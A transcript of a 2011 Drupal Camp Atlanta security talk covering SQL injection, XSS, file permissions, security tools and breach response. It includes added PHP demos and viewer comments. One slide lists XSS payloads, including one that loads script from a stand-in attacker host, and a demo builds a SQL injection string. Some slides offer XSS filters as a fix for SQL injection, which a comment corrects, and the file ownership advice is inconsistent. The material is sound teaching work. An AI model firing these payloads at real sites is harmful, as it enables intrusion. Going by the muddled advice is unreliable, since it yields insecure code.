Drupal Camp Atlanta 2011 - Drupal Security
An introduction to security on Drupal, covering some testing tools, common problems and solutions.

We also introduce the concept of a response team and best practices to get you started.


  • Slide 5 shows sanitizing 'inputs' as a solution to sql injection.
    1) Drupal sanitizes on output, not input.
    2) the functions shown are for combatting XSS, not sql injection.

  • Talk about noexec / nosuid.
  • What is a web application firewall?
  • What is a tiger team? A tiger team is a group of experts assigned to investigate and/or solve technical or systemic problems. The term may have originated in aerospace design but is also used in other settings, including information technology and emergency management. According to a 1964 definition, "In case the term 'tiger team' is unfamiliar to you, it has been described as 'a team of undomesticated and uninhibited technical specialists, selected for their experience, energy, and imagination, and assigned to track down relentlessly every possible source of failure in a spacecraft subsystem.'" The term was used by Rockwell Collins for a roaming installation team, and it is believed that they came up with the name "Tiger Team". (Source: Wikipedia.)
  • As part of the tiger team: identify contact points for out of hours. Set up a mailing list for all team members. Provide all contact numbers for external resources to the team. Access to the communications plan and any associated documents. Identify a chain of command, escalating issues down the chain. Schedule daily response meetings during the investigation. Establish a communication plan for the team to keep all stakeholders informed. Have a web page on your intranet. Flag emails with an incident response code, so they can be collated by legal. Set up a communication plan for employees so they know how to respond if contacted by the press. Manage disclosure between employees and the public. Team members will keep their own departments apprised of the status of the investigation. Appoint a team leader, dedicated to the task.
  • Corporate Communication Plan:
    - Different levels according to the scope of the breach.
    - Internal staff: how to respond to requests for information from reporters, bloggers etc.
    - Prepared press statement.
    - Single point of contact, usually your corporate communications manager.
    - Consult with authorities before communicating anything to the public.
    How prepared is your information technology (IT) department or administrator to handle security incidents? Many organizations learn how to respond to security incidents only after suffering attacks. By this time, incidents often become much more costly than needed. Proper incident response should be an integral part of your overall security policy and risk mitigation strategy.
  • Shutting down the server can execute code that cleans up evidence; cutting the power is much safer and preserves evidence.

Presentation Transcript

  • Locking down Drupal and managing security breaches. By Andy Thornton, Mediacurrent Consultant. Twitter: @BohemianPixel [email_address]
  • Overview
    • Slides will be made available at the end of the presentation.
    • Common Security Issues
    • Drupal Best Practices
    • Testing Tools
    • Web Application Firewalls
    • Tiger Teams
    • Planning and Policies
    • Managing a security breach
    • Resources
    • Questions
  • What is SQL Injection?
    • In its simplest form ...
    Example SQL statement:
    statement = "SELECT * FROM users WHERE name = '" + userName + "';"
    But what would happen if they added something else to their name, something we didn't plan for ...
  • even more simply ...
  • Handling SQL Injection
    • Drupal makes it easy.
      • check_plain()
      • check_markup()
      • filter_xss()
      • filter_xss_admin()
    • Bad:
      $username = $node->field_uname[0]['value'];
    • Good:
      $username = check_plain($node->field_uname[0]['value']);
    • Tip: Don't forget this with other forms of input, such as arguments passed in the URL.
    Sanitise your inputs
  • SQL Injection
    • Drupal 6
      • db_query()
      • db_rewrite_sql()
    • Bad:
      $result = db_query("SELECT * FROM {users} WHERE name = $myvar");
    • Good:
      $result = db_query("SELECT pass FROM {users} WHERE name = '%s'", $myvar);
    • Drupal 7 example:
      $result = db_query("SELECT nid, title FROM {node} WHERE type = :type", array(
        ':type' => 'page',
      ));
    Writing secure queries based on inputs
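The interpolated statement from the "What is SQL Injection" slide, run against an in-memory SQLite database next to a parameterised version, as an added example that is not from the presentation. The table, its rows and the hostile input are constructed for the demonstration; PDO stands in for Drupal's database layer, and the matching Drupal 6 and 7 placeholder forms are shown in comments. It needs PHP with the pdo_sqlite extension.

```php
<?php
// Added example, not from the slides: the slide's concatenated query beside a
// bound-parameter query, both run against a constructed in-memory database.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (uid INTEGER PRIMARY KEY, name TEXT, pass TEXT)");
// Constructed sample rows.
$db->exec("INSERT INTO users (name, pass) VALUES ('alice', 'hash-a')");
$db->exec("INSERT INTO users (name, pass) VALUES ('bob', 'hash-b')");

// Bad: the slide's  statement = "SELECT * FROM users WHERE name = '" + userName + "'"
// The user's string becomes part of the SQL text, so it can change the query.
function lookup_unsafe(PDO $db, string $userName): array
{
    $sql = "SELECT name FROM users WHERE name = '" . $userName . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Good: the value is bound to a placeholder and the SQL text never changes.
// This is what Drupal's placeholders do for you:
//   Drupal 6: db_query("SELECT pass FROM {users} WHERE name = '%s'", $myvar);
//   Drupal 7: db_query("SELECT pass FROM {users} WHERE name = :name",
//                      array(':name' => $myvar));
function lookup_safe(PDO $db, string $userName): array
{
    $stmt = $db->prepare("SELECT name FROM users WHERE name = :name");
    $stmt->execute([':name' => $userName]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$normal  = 'alice';
$hostile = "x' OR '1'='1";   // constructed input: closes the quote, appends an always-true clause

foreach (['unsafe' => 'lookup_unsafe', 'safe' => 'lookup_safe'] as $label => $fn) {
    printf("%-6s normal input  -> %s\n", $label, json_encode($fn($db, $normal)));
    printf("%-6s hostile input -> %s\n", $label, json_encode($fn($db, $hostile)));
}
```

Run it with `php sqli_demo.php`. The concatenated form turns the hostile input into `... WHERE name = 'x' OR '1'='1'`, a condition that holds for every row, so the unsafe lookup hands back the whole table; the bound form compares the column against that exact string, so nothing matches. The `%s` and `:type` placeholders in the Drupal examples buy the same property: the value is quoted for you and never becomes part of the statement.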
  • What is Cross Site Scripting?
    • Cross-site scripting holes are vulnerabilities through which a user can inject malicious scripts into web pages. Using them, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user.
  • What just happened?
    • The script from the previous slide doesn't do anything in Chrome, but when I open the page in Firefox or IE ....
  • More Examples...
    • Don't try these out on your site.
      • ¼script¾alert(¢XSS¢)¼/script¾
      • <object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></object>
      • <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
      • <SCRIPT a=">" SRC="http://www.dodgysite.com/xss.js"></SCRIPT>
      • <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
      • <A HREF="javascript:document.location='/logout'">XSS</A>
  • Protection from XSS
    • Never allow "Full HTML" on your posting input filter for general users.
    • filter_xss($string, $allowed_tags = array('a', 'em', 'strong', 'p'))
    • Wrap your content with
      • filter_xss()
      • check_plain()
      • check_markup()
    • Example:
      <body class="<?php print check_plain($_GET['parameter']); ?>">
    • Rule of Thumb
      • Never trust user input.
      • You can take user input, check it against a reference list and use the resulting output to print the actual data.
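The escape-on-output example and the "reference list" rule of thumb from the "Protection from XSS" slide, written as standalone PHP so it runs outside Drupal; this is an added example, not code from the presentation. The local `escape_plain()` is a stand-in that mirrors what Drupal 7's `check_plain()` does (HTML-escape with `ENT_QUOTES`); inside a module you would call `check_plain()` itself. The request parameter is constructed for the demonstration.

```php
<?php
// Added example, not from the slides: three ways of putting a request
// parameter into a class attribute, from worst to best.

// Stand-in for Drupal's check_plain(): escape <, >, &, " and ' for HTML output.
function escape_plain(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

// Reference-list lookup: the input only selects a value and is never printed.
// Anything not on the list falls back to a known-good default.
function body_class(string $requested, array $allowed, string $default): string
{
    return in_array($requested, $allowed, true) ? $requested : $default;
}

// Constructed request parameter, standing in for $_GET['parameter'].
// It closes the class attribute early and opens a script element.
$parameter = '"><script>alert(1)</script><p class="';

// Bad: raw interpolation; the browser sees a real <script> element.
$unsafe = '<body class="' . $parameter . '">';

// Better: escape on output, as the slide's example does. The quote and the
// angle brackets become &quot; &lt; &gt; and stay inside the attribute value.
$escaped = '<body class="' . escape_plain($parameter) . '">';

// Best: check the input against a reference list and print the matched value.
// The attacker's string never reaches the page at all.
$allowlisted = '<body class="' . body_class($parameter, ['light', 'dark', 'print'], 'light') . '">';

foreach (['unsafe' => $unsafe, 'escaped' => $escaped, 'allowlisted' => $allowlisted] as $label => $html) {
    // A literal "<script" in the output means the markup still carries a live tag.
    $live = strpos($html, '<script') === false ? 'no' : 'YES';
    printf("%-11s live <script> tag: %-3s %s\n", $label, $live, $html);
}
```

The allowlist form is the one the slide's rule of thumb describes: a theme or module that needs a user-chosen class, sort order or filename maps the request value onto a fixed set and prints only members of that set, so there is nothing left to escape.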
  • Permissions
    • chmod changes the permissions on a file: what the owning user, the members of its group, and the rest of the world can do with it.
    • It supports +/-, so:
      chmod o-w myfile
    • This example removes the world's ability to edit the file, making it read-only for everyone outside the owner and group.
    • chown changes the ownership of a file or directory. For Drupal we would give the world (Apache) read-only access to our settings.php, but let the user own the rest of the directory:
      chmod 400 settings.php
      chown www-data:www-data settings.php
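A small audit script, added here and not part of the presentation, that checks the two targets from the "Permissions" slide on a Drupal docroot: `settings.php` is reported if any write bit is set (the slide's target is mode 400), and anything under `sites/default` is reported if the world-write bit is set (the bit that `chmod o-w` clears). The temporary docroot it builds at the bottom, with a 644 `settings.php` and a 666 upload, is constructed so the script runs stand-alone; the `sites/default` layout is the standard Drupal one.

```php
<?php
// Added example, not from the slides: report files whose permissions miss
// the targets on the slide. Reads metadata only; changes nothing.

function permission_report(string $docroot): array
{
    clearstatcache();
    $findings = [];
    $site     = $docroot . '/sites/default';
    $settings = $site . '/settings.php';

    if (!is_file($settings)) {
        return ["$settings not found"];
    }
    $mode = fileperms($settings) & 0777;
    if ($mode & 0222) {   // any write bit for owner, group or world
        $findings[] = sprintf('%s is writable (mode %04o, slide target 0400)', $settings, $mode);
    }

    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($site, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::SELF_FIRST
    );
    foreach ($iter as $entry) {
        $path = $entry->getPathname();
        $mode = fileperms($path) & 0777;
        if ($mode & 0002) {   // the world-write bit that "chmod o-w" removes
            $findings[] = sprintf('%s is world-writable (mode %04o)', $path, $mode);
        }
    }
    return $findings;
}

// Constructed docroot: one deliberately loose settings.php and one 666 upload.
$docroot = sys_get_temp_dir() . '/drupal-perm-demo-' . getmypid();
$files   = $docroot . '/sites/default/files';
mkdir($files, 0755, true);
file_put_contents($docroot . '/sites/default/settings.php', "<?php\n");
chmod($docroot . '/sites/default/settings.php', 0644);   // should be 0400
file_put_contents($files . '/upload.txt', "sample\n");
chmod($files . '/upload.txt', 0666);                     // world-writable

foreach (permission_report($docroot) as $finding) {
    echo $finding, PHP_EOL;
}
```

To audit a live site, call `permission_report()` with the real docroot instead of the constructed one. Keep in mind that the files directory must stay writable by the web server user, so a finding there means the world bit is set, not that Apache's own write access is wrong.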
  • Social Engineering
    • Meet Kevin Mitnick, master of social engineering. http://mitnicksecurity.com/
    • It seems to be a universal truth that most people don't believe social engineering (gaining information by deceit) could be so easy. "No one could be that stupid" is a common phrase heard from people who first learn how these types of attacks work. However, once it is demonstrated (especially with some personal information of theirs) they become hard and fast believers. Just seeing it in action brings home the reality that information can leak through almost any worker and that one must always be on guard.
  • Couple of one-liners ...
    • nosuid / noexec
    • Set up /sites/default/files and /tmp on their own partitions:
      /dev/sda3 /home/andy/public_html/sites/default/files ext3 defaults,nosuid
    • Set wgetrc to not save downloads:
      delete_after = on
    • Regular security scans against code.
    • Use a tool like OpenVAS / RATS or a web application firewall such as WhiteHat Sentinel.
    • Limit who has access to your code base and server.
    • Don't let vendors have more access than they need.
    • Code for what you expect.
    • Stop playing whack-a-mole and take ownership of your code.
  • Web Application Firewalls
  • Handy Tools to know
    • Open source tools
      • OpenVAS
      • R.A.T.S.
      • Tripwire
      • NAXSI
    • Commercial
      • Web Inspect (HP)
      • Whitehat (WAF)
      • Barracuda (WAF)
      • Imperva (WAF)
    • Command Line Warriors
      • lsof
      • grep
      • find
    • Web Application Firewalls
      • NAXSI  
      • Armorlogic
      • Array Networks 
      • Barracuda Web Application Firewall
      • Cisco
      • Citrix NetScaler
      • F5 Networks
      • Fortinet
      • ModSecurity
      • Radware
      • SonicWALL
      • Imperva
      • WhiteHat Security
  • Tiger Teams
    • "It is better to BE ready, than to GET ready."
  • What is a tiger team?
    • Who's on it and why?
      • IT Department.
      • Website Technical Lead (or project manager)
      • Management stakeholders.
      • Marketing & Corporate Communications team
      • Legal Department.
    • Trivia note: Microsoft refers to a Tiger Team as a "Core Computer Security Incident Response Team", or CCSIRT for short. They have a good article on TechNet on roles in a Tiger... <oops> CCSIRT team. http://technet.microsoft.com/en-us/library/cc700825.aspx
    The term originated in aerospace design but is also used in other settings, including information technology and emergency management. According to a 1964 definition, "It has been described as a team of undomesticated and uninhibited technical specialists, selected for their experience, energy, and imagination, and assigned to track down relentlessly every possible source of failure in a spacecraft subsystem." - Wikipedia
  • What do they do?
    • Have access to contact points for out-of-hours members of the team, stakeholders and third parties. Set up an email address for the team (e.g. tiger@mycompany.com). Have access to the communications plan and any associated documents.
    • Secure an area of the network for collating evidence and documentation. Identify a chain of command, escalating communication down the chain. Schedule daily response meetings during the investigation. Establish a communication plan for the team to keep all stakeholders informed.
    • Flag emails with an incident response code, so they can be collated by legal, or include the tiger email address. Set up a communication plan for employees so they know how to respond if contacted by the press. Manage disclosure between employees and the public. Team members will keep their own departments apprised of the status of the investigation. Appoint a team leader, dedicated to the task; they are the prime contact for the management team.
  • Always have a plan
      • Corporate Communication Plan.
      • Incident Response Worksheet.
      • Prepared Press release.
      • Internal Communication Policy. (loose lips, sink ships)
      • Communication list of internal stakeholders.
      • Appoint a single point of contact for inquiries.
      • Collect contact numbers for everyone involved and all third party resources.
      • Have a secure place set aside on your network / intranet.
    "I have a plan so cunning you could stick a tail on it and call it a weasel" - Lord Edmund Blackadder
  • Always remember ...
    • Sanitise your in/output.
    • Use Drupal methods.
    • Keep your site up to date.
    • Have a plan in place.
    • Audit your code.
    • Never, never hack core.
    • Or Dries will send out creatures from Acquia's secret lab specifically trained to hunt Kittens ...
  • Handling a security breach
  • First Off
  • Unleash the Tigers
  • Activate your CSIRT .. Tiger Team!
      • Start the clock.
      • Pull the plug, don't shut it down.
      • Redirect to a static page at the DNS level.
      • If possible, take a copy of the disk and store it offline.
      • Get the authorities involved the moment you have verified data has been compromised.
      • Don't use a backup without knowing the cause of the attack.
      • Don't change passwords or try and fix files.
      • If the filesystem was compromised, don't trust that server build.
      • Investigate in parallel to the authorities.
    Follow your workflow and communication plan.
  • Resources
    • Security Team: http://drupal.org/node/32750
    • Security advisories: http://drupal.org/security
    • Secure Text Handling: http://drupal.org/node/28984
    • Writing Secure Code: http://drupal.org/writing-secure-code
    • Responding to IT Security Incidents: http://technet.microsoft.com/en-us/library/cc700825.aspx
    • Slides: http://bit.ly/dca-security
    Secret Service Atlanta Electronic Crimes Task Force, 404-331-6111, Email: [email_address]
  • Questions?